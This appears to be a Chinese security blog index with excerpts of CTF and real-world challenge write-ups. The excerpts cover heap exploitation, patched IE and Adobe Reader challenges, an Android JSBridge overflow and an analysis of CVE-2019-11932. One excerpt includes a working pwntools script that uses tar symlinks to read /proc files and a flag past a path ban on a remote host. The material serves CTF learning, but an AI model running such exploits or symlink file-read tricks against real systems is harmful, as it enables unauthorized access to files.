0%

程序的功能是可以泄露任意地址的数据,然后可以往任意地址处写一个堆地址

由于写完后,没有调用相关的IO输入输出函数,因此劫持IO流没用,于是想到劫持exit,在exit断点,在exit开始处有一个指针,其内部是某些结构

阅读全文 »

通过盲打测试,可以发现在compress的rename时,可以覆盖掉已经存在的文件,这样,我们就可以使得我们自己上传的文件被打上标记,从而能够对我们上传的压缩包进行解压,通过提示功能知道flag在/home/ctf/flag,于是考虑在本地制造一个软链接文件,然后压缩成tar,这样在远程解压时链接上。然后我们就可以读取文件内容了,发现/home路径被ban了。于是先读取/proc/self/status,得到父进程的pid,这样,我们就可以通过/proc/{ppid}/cwd去访问/home/ctf目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
#coding:utf8
from pwn import *
import os
sh = remote('47.104.178.87',35360)

def upload(content):
sh.sendlineafter('>','u')
sh.sendlineafter('Content:',content)
sh.recvuntil('File uploaded as /tmp/')
return sh.recvuntil('\n',drop = True)

def compress(name,rename=''):
sh.sendlineafter('>','c')
sh.sendlineafter('Filename: /tmp/',name)
if rename == '':
sh.sendlineafter('Rename archive file? [y/N]','N')
else:
sh.sendlineafter('Rename archive file? [y/N]','y')
print 'rename',rename
sh.sendlineafter('Arcname:',rename)
sh.recvuntil('File compressed as ')
return sh.recvuntil('\n',drop = True)

def extract(name):
sh.sendlineafter('>','x')
sh.sendlineafter('Filename:',name)

def readf(name):
sh.sendlineafter('>','r')
sh.sendlineafter('Filename:',name)

def watch(file):
os.system('rm -r ff')
os.system('ln -s {} ff'.format(file))
os.system('tar -cvpf ff.tar ff')

f = open('ff.tar','rb')
content = f.read()
f.close()
a = upload(content)

b = upload('haivk')
b_c = compress(b)

a_c = compress(a,b_c)
extract(a_c)

#解压我们自己上传的tar文件
extract(b_c)

#改变权限
compress(a,'ff')
readf('ff')

#context.log_level = 'debug'
watch('/proc/self/status')
sh.recvuntil('PPid:')
ppid = int(sh.recvuntil('\n',drop = True))
print ppid
watch('/proc/{}/cwd/flag'.format(ppid))

sh.interactive()

文章首发于安全KER https://www.anquanke.com/post/id/222678

0x00前言

最近在学浏览器方面的漏洞挖掘,就从强网杯的这道PiAno(PA)来分享一下我个人的收获与总结
题目信息:
**题目名称:**PiAno
**旗帜名称:**PA
**题目描述:**附件中提供了一个Win10虚拟机,虚拟机中存在一个patch过jscript9.dll的IE浏览器,挖掘并利用程序漏洞,实现任意代码执行,在靶机中弹出计算器程序。
**靶机环境:**Win10 虚拟机。
**附件信息:**Win10 虚拟机(与靶机一致)。
**展示环境拓扑:**交换机连接选手攻击机和展示机,展示机使用VMware(最新版)运行靶机,靶机通过NAT方式连接到网络。
验证过程:选手携带自己的攻击机上台展示题解,操作人员使用虚拟机中的IE浏览器访问选手的提供的页面。在规定的时间内,在靶机中弹出计算器程序判定为题解正确。
**注意事项:**上台展示题解的时候注意关闭exp的调试信息。

阅读全文 »

文章首发于安全KER https://www.anquanke.com/post/id/222391

0x00 前言

第一次来强网杯线下,接触了realword题,收获很大,深有感触
题目信息:
**题目名称:**ADoBe
**旗帜名称:**ADB
**题目描述:**附件中给出了一个Adobe Reader DC可执行程序,请挖掘并利用该程序中的漏洞,在靶机中弹出计算器程序。
靶机环境:Win10 虚拟机,默认安装配置,系统补丁安装至最新。系统安装了附件中提供中的Adobe Reader DC程序,并已关闭程序沙箱。
**附件信息:**Adobe Reader DC程序及相关Dll文件,版本均与靶机中的一致。
展示环境拓扑:交换机连接选手攻击机和展示机,展示机使用VMware(最新版)运行靶机,靶机通过NAT方式连接到网络。
展示过程:选手携带自己的攻击机上台展示题解,攻击机需运行HTTP服务,供操作员下载能够利用程序漏洞的PDF文档。操作员打开PDF文档后,在规定的时间内,在靶机中弹出计算器程序判定为题解正确。
注意事项:
(1)在解题时,可通过在注册表项
HKLM\SOFTWARE\Wow6432Node\Policies\Adobe\Acrobat Reader\DC\FeatureLockDown中修改键值项bProtectedMode(DWORD类型),赋值为0来关闭Adobe Reader DC程序的沙箱;
(2)上台展示题解的时候注意关闭exp的调试信息。

阅读全文 »

一个安卓端程序,native层是简单的菜单程序,其中edit功能没有检查长度,可以溢出,并且没有使用\0截断字符串,在show的时候可以泄露后续的数据

难点在于如何进行交互,程序注册了JSBridge用于与js进行交互,其中该接口对象在js中的对象名为_jsbridge

阅读全文 »

CVE-2019-11932分析

android-gif-drawable是谷歌开源的一个安卓端gif解析库,可以用来渲染gif,被许多app所应用,如what’s app等知名软件。在android-gif-drawable的v 1.2.17以及之前的版本中存在一个double free的漏洞,该漏洞存在于decoding.c中DDGifSlurp函数中。

阅读全文 »

edit功能存在溢出,可以控制string对象,来实现任意地址读写

控制string对象,泄露出exe基址和dll的基址,然后就是泄露peb、teb地址,得到stack_base,为了能够准确得到栈rop的地址,我们在栈里布置一个字符串用来做TAG,然后利用任意地址读写从stack_base处开始搜索栈,直到找到我们布下的这个TAG。然后就是做ROP更改堆的执行权限后跳到堆里执行shellcode。

阅读全文 »